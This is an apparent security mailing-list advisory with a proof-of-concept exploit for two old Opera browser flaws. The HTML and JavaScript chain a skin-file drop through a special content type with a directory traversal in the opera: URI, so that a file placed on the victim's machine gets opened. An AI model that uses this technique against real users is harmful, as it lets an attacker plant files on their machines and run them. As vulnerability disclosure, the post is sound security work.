__________________________________
Do you Yahoo!?
Protect your identity with Yahoo! Mail AddressGuard
http://antispam.yahoo.com/whatsnewfree
Opera Skinned & Opera Directory Traversal (Additional Details & a Simple Exploit):
==================================================================================
ADDITIONAL DETAILS:
While installing Opera, if the "USE SEPARATE SETTINGS FOR EACH USER" option is
selected, the "opera7/profile" folder is stored in the "<username>/application
data/opera7" location instead of in the Opera root folder. The "profile" folder
contains user specific data for different Opera users. Therefore, each user has a
different "profile" folder in his "<username>/application data/opera7" folder.
Folders of interest to us in which configuration files are automatically downloaded
and stored(like skin, toolbar, mouse, etc.) are subfolders of the "profile" folder and
hence are also moved to this location.
In this scenario, the arbitrary files can still be dropped in the respective folders.
However, for executing the files, the <username> variable must be known. Other methods
of exploiting this scenario may come up later.
SIMPLE PoC EXPLOIT:
This is a simple PoC for the two Opera vulnerabilities detailed in the "Opera Skinned
: Arbitrary File Dropping And Execution" and "Opera Web Browser Directory Traversal in
Internal URI Protocol" advisories.
"main.htm" is the file which is to be loaded into the browser remotely. This file
opens "skin.htm" in a new window. The Content-Type of "skin.htm" should be set as
"application/x-opera-skin" on the server. When skin.htm is opened in this way, it is
dropped in the "<opera dir>/profile/skin/" folder on the victim's machine. This
demonstrates the first vulnerability.
After dropping skin.htm, main.htm is redirected to the local skin.htm. The path of
skin.htm is calculated using the second vulnerability. This demonstrates the second
vulnerability.
NOTE: Dont forget to set the Content-Type as "application/x-opera-skin" for skin.htm.
---------------START MAIN.HTM----------------
<html>
<head>
<script language="javascript">
var win=open("skin.htm") // The server should return content-type as
// "application/x-opera-skin" for "Skin.htm". "Skin.htm" will be dropped in the
"<opera // dir>/profile/skin/" folder.
setTimeout("redir()",2000) //modify according to your situation.
function redir(){
window.location.href="opera:/help/..%5c/profile/skin/skin.htm" //This uses
the // directory traversal flaw mentioned in advisory 2 to get the path of the dropped
file. In this // case, it is skin.htm.
}
</script>
</head>
<body>
<h1>This is the main file</h1>
</body>
</html>
---------------END MAIN.HTM----------------
---------------START SKIN.HTM----------------
<body>
<h1> Opera Skinned!!! </h1><p>This is Skin.htm from "<opera dir>/profile/skin/"
in localhost.
</body>
---------------END SKIN.HTM----------------
--
S.G.Masood
[EMAIL PROTECTED]
Hyderabad,
India.
DISCLAIMER:
This advisory is meant only for the dissemination of information, alerting the general
public about a security issue. Use this information at your own discretion.
In brief, the author is not responsible for any use, misuse, abuse of this
information. Also, this information is provided "as is" without any warranty of any
kind.
